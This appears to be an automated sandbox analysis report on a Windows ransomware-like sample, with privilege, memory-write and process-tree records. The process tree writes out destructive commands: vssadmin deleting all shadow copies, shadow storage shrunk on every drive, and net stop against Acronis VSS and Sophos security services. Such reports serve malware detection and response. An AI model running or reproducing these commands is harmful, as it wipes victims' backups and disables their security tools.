Token: SeSecurityPrivilege	5048	wevtutil.exe
Token: SeBackupPrivilege	5048	wevtutil.exe
Token: SeSecurityPrivilege	3128	cmd.exe
Token: SeBackupPrivilege	3128	cmd.exe
Token: SeSecurityPrivilege	2836	wevtutil.exe
Token: SeBackupPrivilege	2836	wevtutil.exe
Token: SeSecurityPrivilege	1596	wevtutil.exe
Token: SeBackupPrivilege	1596	wevtutil.exe
Token: SeSecurityPrivilege	976	net1.exe
Token: SeBackupPrivilege	976	net1.exe
Token: SeSecurityPrivilege	3008	net.exe
Token: SeBackupPrivilege	3008	net.exe
Token: SeSecurityPrivilege	680	wevtutil.exe
Token: SeBackupPrivilege	680	wevtutil.exe
Token: SeSecurityPrivilege	3284	net1.exe
Token: SeBackupPrivilege	3284	net1.exe
Token: SeSecurityPrivilege	4952	wevtutil.exe
Token: SeBackupPrivilege	4952	wevtutil.exe
Token: SeSecurityPrivilege	4456	wevtutil.exe
Token: SeBackupPrivilege	4456	wevtutil.exe
Token: SeSecurityPrivilege	2332	wevtutil.exe
Token: SeBackupPrivilege	2332	wevtutil.exe
Token: SeSecurityPrivilege	4656	wevtutil.exe
Token: SeBackupPrivilege	4656	wevtutil.exe
Token: SeSecurityPrivilege	2164	wevtutil.exe
Token: SeBackupPrivilege	2164	wevtutil.exe
Token: SeSecurityPrivilege	4408	wevtutil.exe
Token: SeBackupPrivilege	4408	wevtutil.exe
Token: SeSecurityPrivilege	344	wevtutil.exe
Token: SeBackupPrivilege	344	wevtutil.exe
Token: SeSecurityPrivilege	1976	wevtutil.exe
Token: SeBackupPrivilege	1976	wevtutil.exe
Token: SeSecurityPrivilege	4880	wevtutil.exe
Token: SeBackupPrivilege	4880	wevtutil.exe
Token: SeSecurityPrivilege	276	net1.exe
Token: SeBackupPrivilege	276	net1.exe
Token: SeSecurityPrivilege	280	wevtutil.exe
Token: SeBackupPrivilege	280	wevtutil.exe
Token: SeSecurityPrivilege	2160	wevtutil.exe
Token: SeBackupPrivilege	2160	wevtutil.exe
Token: SeSecurityPrivilege	4964	wevtutil.exe
Token: SeBackupPrivilege	4964	wevtutil.exe
Token: SeSecurityPrivilege	2200	wevtutil.exe
Token: SeBackupPrivilege	2200	wevtutil.exe
Token: SeSecurityPrivilege	1620	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3364 wrote to memory of 4116	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	70
PID 3364 wrote to memory of 4116	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	70
PID 3364 wrote to memory of 4112	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	71
PID 3364 wrote to memory of 4112	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	71
PID 3364 wrote to memory of 4176	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	72
PID 3364 wrote to memory of 4176	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	72
PID 4176 wrote to memory of 3028	4176	cmd.exe	73
PID 4176 wrote to memory of 3028	4176	cmd.exe	73
PID 3364 wrote to memory of 744	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	74
PID 3364 wrote to memory of 744	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	74
PID 3364 wrote to memory of 3468	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	76
PID 3364 wrote to memory of 3468	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	76
PID 3364 wrote to memory of 3076	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	75
PID 3364 wrote to memory of 3076	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	75
PID 3364 wrote to memory of 4264	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	77
PID 3364 wrote to memory of 4264	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	77
PID 3364 wrote to memory of 4320	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	78
PID 3364 wrote to memory of 4320	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	78
PID 3364 wrote to memory of 4308	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	79
PID 3364 wrote to memory of 4308	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	79
PID 3364 wrote to memory of 4304	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	80
PID 3364 wrote to memory of 4304	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	80
PID 3364 wrote to memory of 4292	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	81
PID 3364 wrote to memory of 4292	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	81
PID 3364 wrote to memory of 4276	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	82
PID 3364 wrote to memory of 4276	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	82
PID 3364 wrote to memory of 4336	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	83
PID 3364 wrote to memory of 4336	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	83
PID 744 wrote to memory of 3260	744	cmd.exe	84
PID 744 wrote to memory of 3260	744	cmd.exe	84
PID 3364 wrote to memory of 1852	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	85
PID 3364 wrote to memory of 1852	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	85
PID 3364 wrote to memory of 4412	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	86
PID 3364 wrote to memory of 4412	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	86
PID 3364 wrote to memory of 4396	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	87
PID 3364 wrote to memory of 4396	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	87
PID 3364 wrote to memory of 4400	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	89
PID 3364 wrote to memory of 4400	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	89
PID 3364 wrote to memory of 4388	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	88
PID 3364 wrote to memory of 4388	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	88
PID 3364 wrote to memory of 4464	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	90
PID 3364 wrote to memory of 4464	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	90
PID 3364 wrote to memory of 4456	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	91
PID 3364 wrote to memory of 4456	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	91
PID 3364 wrote to memory of 4440	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	92
PID 3364 wrote to memory of 4440	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	92
PID 3364 wrote to memory of 4436	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	94
PID 3364 wrote to memory of 4436	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	94
PID 3364 wrote to memory of 4364	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	93
PID 3364 wrote to memory of 4364	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	93
PID 3364 wrote to memory of 4468	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	95
PID 3364 wrote to memory of 4468	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	95
PID 3364 wrote to memory of 4372	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	96
PID 3364 wrote to memory of 4372	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	96
PID 3364 wrote to memory of 4356	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	97
PID 3364 wrote to memory of 4356	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	97
PID 3364 wrote to memory of 4344	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	98
PID 3364 wrote to memory of 4344	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	98
PID 3364 wrote to memory of 3272	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	99
PID 3364 wrote to memory of 3272	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	99
PID 3364 wrote to memory of 4324	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	100
PID 3364 wrote to memory of 4324	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	100
PID 3364 wrote to memory of 3324	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	101
PID 3364 wrote to memory of 3324	3364	7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe	101

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
1988	Process not Found
4816	attrib.exe
3260	attrib.exe
3348	Process not Found
4464	Process not Found
4880	Process not Found
3224	Process not Found
4516	Process not Found

C:\Users\Admin\AppData\Local\Temp\7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe
"C:\Users\Admin\AppData\Local\Temp\7dfcbf301686c56d31874642114b1c6ff8f78dfd76f4b88c2f056b7aff8fb19b.bin.exe"
1⤵
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3364
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
  2⤵
  PID:4116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c echo off
  2⤵
  PID:4112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c chcp 437
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4176
- - C:\Windows\system32\chcp.com
    chcp 437
    3⤵
    PID:3028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Acronis VSS Provider"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:744
- - C:\Windows\system32\net.exe
    net stop "Acronis VSS Provider"
    3⤵
    PID:3260
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Acronis VSS Provider"
      4⤵
      PID:2648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet
  2⤵
  PID:3076
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet
    3⤵
    PID:652
  - - C:\Windows\system32\vssadmin.exe
      vssadmin Delete Shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:1200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
  2⤵
  PID:3468
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
    3⤵
    PID:1420
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:2860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
  2⤵
  PID:4264
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
    3⤵
    PID:588
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
  2⤵
  PID:4320
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
    3⤵
    PID:516
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=H:\ /on=H:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:4072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
  2⤵
  PID:4308
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
    3⤵
    PID:856
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=G:\ /on=G:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:4784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
  2⤵
  PID:4304
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
    3⤵
    PID:436
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=I:\ /on=I:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:1324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
  2⤵
  PID:4292
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
    3⤵
    PID:816
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=J:\ /on=J:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:4744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
  2⤵
  PID:4276
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
    3⤵
    PID:644
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:5060
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
  2⤵
  PID:4336
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
    3⤵
    PID:1944
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=L:\ /on=L:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:1280
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
  2⤵
  PID:1852
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
    3⤵
    PID:1660
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:4840
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
  2⤵
  PID:4412
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
    3⤵
    PID:1796
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=N:\ /on=N:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:5012
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
  2⤵
  PID:4396
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
    3⤵
    PID:2316
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=O:\ /on=O:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:1080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
  2⤵
  PID:4388
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
    3⤵
    PID:1748
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=R:\ /on=R:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:3008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
  2⤵
  PID:4400
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
    3⤵
    PID:1808
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=P:\ /on=P:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:5064
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
  2⤵
  PID:4464
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
    3⤵
    PID:1372
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=Q:\ /on=Q:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:4656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
  2⤵
  PID:4456
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=M:\ /on=M:\ /maxsize=401MB
    3⤵
    PID:1180
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "MSSQL$SYSTEM_BGC"
      4⤵
      PID:4104
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
  2⤵
  PID:4440
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=S:\ /on=S:\ /maxsize=401MB
    3⤵
    PID:1184
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
  2⤵
  PID:4364
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
    3⤵
    PID:2028
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=U:\ /on=U:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:4932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
  2⤵
  PID:4436
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
    3⤵
    PID:1920
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:4828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
  2⤵
  PID:4468
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
    3⤵
    PID:4884
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:892
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
  2⤵
  PID:4372
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
    3⤵
    PID:2932
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:1208
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
  2⤵
  PID:4356
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
    3⤵
    PID:2368
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:1328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
  2⤵
  PID:4344
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
    3⤵
    PID:4572
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:2300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
  2⤵
  PID:3272
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
    3⤵
    PID:4624
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB
      4⤵
      Interacts with shadow copies
      PID:1616
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
  2⤵
  PID:4324
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
    3⤵
    PID:4888
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:5024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
  2⤵
  PID:3324
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
    3⤵
    PID:4860
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=Y:\ /on=Y:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:2520
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
  2⤵
  PID:3020
- - C:\Windows\System32\cmd.exe
    C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
    3⤵
    PID:4924
  - - C:\Windows\system32\vssadmin.exe
      vssadmin resize shadowstorage /for=B:\ /on=B:\ /maxsize=401MB
      4⤵
      Enumerates connected drives
      Interacts with shadow copies
      PID:1628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop " Enterprise Client Service"
  2⤵
  PID:3264
- - C:\Windows\system32\net.exe
    net stop " Enterprise Client Service"
    3⤵
    PID:3296
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop " Enterprise Client Service"
      4⤵
      PID:4180
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Agent"
  2⤵
  PID:5032
- - C:\Windows\system32\net.exe
    net stop "Sophos Agent"
    3⤵
    PID:4116
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Agent"
      4⤵
      PID:4112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos AutoUpdate Service"
  2⤵
  PID:4280
- - C:\Windows\system32\net.exe
    net stop "Sophos AutoUpdate Service"
    3⤵
    PID:4520
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos AutoUpdate Service"
      4⤵
      PID:4148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Clean Service"
  2⤵
  PID:4588
- - C:\Windows\system32\net.exe
    net stop "Sophos Clean Service"
    3⤵
    PID:3668
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Clean Service"
      4⤵
      PID:924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c net stop "Sophos Device Control Service"
  2⤵
  PID:64
- - C:\Windows\system32\net.exe
    net stop "Sophos Device Control Service"
    3⤵
    PID:1368
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "Sophos Device Control Service"
      4⤵
      PID:4856
